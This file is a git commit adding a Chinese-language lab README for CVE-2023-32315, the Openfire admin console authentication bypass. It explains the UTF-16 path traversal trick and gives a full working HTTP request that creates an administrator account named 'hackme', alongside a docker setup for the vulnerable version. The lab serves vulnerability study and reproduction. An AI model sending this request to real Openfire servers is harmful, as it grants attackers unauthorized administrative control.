first commit

openfire/CVE-2023-32315/README.zh-cn.md

@@ -0,0 +1,52 @@
+# Openfire管理后台认证绕过漏洞（CVE-2023-32315）
+
+Openfire 是根据开放源 Apache 许可获得许可的实时协作（RTC）服务器。
+
+在Openfire版本4.7.4和4.6.7及以前，Openfire的Web管理后台存在一处目录穿越漏洞，这将允许攻击者绕过权限校验访问所有受限页面。
+
+参考文档：
+
+- <https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm>
+- <https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w>
+
+## 漏洞环境
+
+执行如下命令启动一个4.7.4版本的Openfire:
+
+```
+docker compose up -d
+```
+
+服务器启动后，访问`http://your-ip:9090`你将会被强制跳转到登录页面。
+
+## 漏洞复现
+
+十多年前，Openfire管理后台中曾被发现一处路径穿越漏洞，CVE-2008-6508。攻击者可以利用`/setup/setup-/../../[page].jsp`来绕过权限校验并访问任意后台页面。
+
+从那以后，Openfire增加了对于路径穿越问题的防护策略，用以抵御这个漏洞。但是因为后来内置的Web服务器的升级，引入了对UTF-16字符支持的非标准URL，而前面的防护策略并没有考虑到这一点。
+
+这样也导致我们可以使用UTF-16字符来绕过路径穿越的防护，再次复活路径穿越漏洞，`/setup/setup-/%u002e%u002e/%u002e%u002e/[page].jsp`。
+
+我们可以发送如下数据包，利用该路径穿越漏洞创建一个新的管理员：
+
+```
+GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=hackme&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User HTTP/1.1
+Host: localhost:9090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Cookie: csrf=csrftoken
+
+
+```
+
+虽然这个请求的响应包中包含异常，但实际上新用户已经被创建，账号密码均为`hackme`：
+
+![](1.png)
+
+之后我们便可以使用这个账号登录管理后台：
+
+![](2.png)